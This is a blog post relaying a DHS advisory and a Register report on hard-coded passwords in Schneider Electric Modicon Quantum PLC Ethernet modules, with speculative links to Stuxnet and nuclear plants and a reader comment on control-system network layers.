DHS warns of SCADA vulnerability; neglects to mention what it resembles or how closely | (the STUXNET files)

An electronic device used to control machinery in water plants and other industrial facilities contains serious weaknesses that allow attackers to take it over remotely, the U.S. Industrial Control Systems Cyber Emergency Response Team warned. Some models of the Modicon Quantum PLC used in industrial control systems contain multiple hidden accounts that use predetermined passwords to grant remote access, the agency said in an advisory issued December 14. Palatine, Illinois– based Schneider Electric, the maker of the device, produced fixes for some of the weaknesses, and continues to develop additional mitigations. The programmable logic controllers reside at the lowest levels of an industrial plant, where computerized sensors meet the valves, turbines, or other machinery being controlled. The default passwords are hard-coded into Ethernet cards the systems use to funnel commands into the devices, and get temperatures and other data out of them. The Ethernet modules also allow administrators to remotely log into the machinery using protocols such as telnet, FTP, and the Windriver Debug port. According to a blog post published December 12 by an independent security researcher, the NOE 100 and NOE 771 modules contain at least 14 hard-coded passwords, some of which are published in support manuals. Even in cases where the passcodes are obscured using cryptographic hashes, they are easy to recover thanks to documented weaknesses in the underlying VxWorks operatingsystem. As a result, attackers can exploit the weakness to log into devices and gain privileged access to their controls.


The source article is worth visiting for at least two reasons.  It gives us the link for "the  blog post published on Monday by independent security researcher Rubén Santamarta," and goes on to inform us, just after the end of the passage the DHS saw fit to quote:

SCADA vuln imperils critical infrastructure, feds warn. 

December 14, The Register – (International) 

Hard-coded passwords are a common weakness built into many industrial control systems, including some S7 series of PLCs from Siemens. Because the systems control the machinery connected to dams, gasoline refineries, and water treatment plants, unauthorized access is considered a national security threat because it could be used to sabotage their operation.

Read more 

Remind anyone of anything ?

From Schneider Electric (which forms, according to Wikipedia , a cornerstone of AREVA:

Total safety: The cornerstone of our business 

Although electricity is the most flexible energy to generate, transmit and use, 
it can be hazardous if not properly managed. From homes to nuclear power 
plants, Schneider Electric’s mission is to ensure the safety of people and 

Read more 

In fact, Modicon PLC's were, at least as of 2006, in use at
  • at least one nuclear plant in Virginia 
  • two in Korea ("The DPS [Diverse Protection System] configuration is based on a Modicon PLC, which is now supplied by Schneider Electric." notes the NRC, adding helpfully "The use of multiple vendors and digital platforms promotes system diversity among the echelons of defense."
  • in Bruce Nuclear Generation Station at Tiverton, Ontario 
  • and no doubt many more I have not the determination, at present, out of obscurity to dig,  given the penchant this industry has into the same, to bury.  Witness how neatly the following company avoids, in their boasts, the very proper nouns that would pinpoint what nuclear power plants, likely Canadian, are now at risk:

Synopsis of Nuclear Reactor Retubing Controls Automation System Project

Situation: A nuclear power generation company committed to upgrading its operations with new reactors.
Issues: Aging reactors subject to problems such as water leakage, corrosion, and contamination (fine powdery particulate—iron oxide activated to isotope FE55—as a result of corrosion) that are potentially hazardous and costly to deal with.
Requirement: Upgrade of 2 reactors (including re-tubing operations).
Technology: Unity Pro IEC 61131-3 application software/Modicon Quantum PLC platform; GE Iconics Series HMI; Ethernet; Kepware OPC driver; Kollmorgen drives; PICS™ simulation.

Read more  

Be seeing you.

1 comment:

  1. I find it odd that DHS is making an issue out of these passwords for these systems. If you were to talk to an experienced control system engineer - who is also very aware of the NWO and is concerned about criminal and deceptive activities by globalist interests etc - that engineer would look at you and say "so what?"

    I'm not a control systems engineer but I do know and understand control systems strucure and security. For a DCS System (the type of centralized "Distributed Control System" that is used in nuke plants and large manufacturing environments, you have devices in the field that are monitored and controlled, you have the smaller control computers (like the Modicon PLC's in the article) that monitor and control these devices, you have an array of modules that pull and push data to and from the field PLC's, and you have a layer above that that contains control system modules that run the core application.

    Think of a drawing of a system like this in the shape of a pyramid with at least 5 levels, or layers, showing all of the field devices in a layer across the bottom row (instruments and motors etc), with all of the PLCs that control and monitor the device layer sitting across the smaller row above. These are plugged into a computer network that is dedicated to this system in 99.999% of all systems. The PLC layer communicates to the modules of a DCS system, which communicate input and output to/from an even highr layer (the actual DCS system) that runs the primary code.

    Here's the pyramid with levels (L). The modicon PLC's reside at L1 below:

    L4: Business Sytems -
    L3: Production ---
    L2: Input/Output -------
    L1: PLC's -----------
    L0: Devices ---------------

    Now we're getting to my point. In order to infect one of these Modicon PLC's that are associated with a DCS system (L3), you need to either physically load it directly onto the PLC hardware by standing in front of the PLC and connecting a local laptop to load a virus. This is how truly secure facilities make changes today at the PLC (Layer 1) level.

    System security in this case is at Layers 3 and 4 in my diagram. Layer 3 (L3) is the manufacturing system, which has different types of security depending upon how the system is configured to communicate with the business network. In most cases, the system is configured to align with the corporate netork security protocols which enables mgt to align production activities with HR assignments, and enables the system to more easily integrate with inventory systems etc. if you construct a virus that is dedicated towards infecting DCS manufacturing systems, using remote access capabilities, this is the lowest layer that you could penetrate. Period.

    So I certainly don't doubt that there's a variant of Stuxnet that can modify and manipulate Modicon PLC's - which CAN operate as stand alone systems on a network with external communications capabilities. But... PLC's operating on a DSC system are networked throughthe manufacturing layer, which is typically purposefully limited to local networks only - without external communications capability.

    With that in mind, I go all the way back to my initial concern - why woult DHS warn about this with reagard to nuclear facilities? This should be technically impossible, unless someone on the inside is working the virus, which would make the problem moot because that risk exists in any facility. It's just odd to me.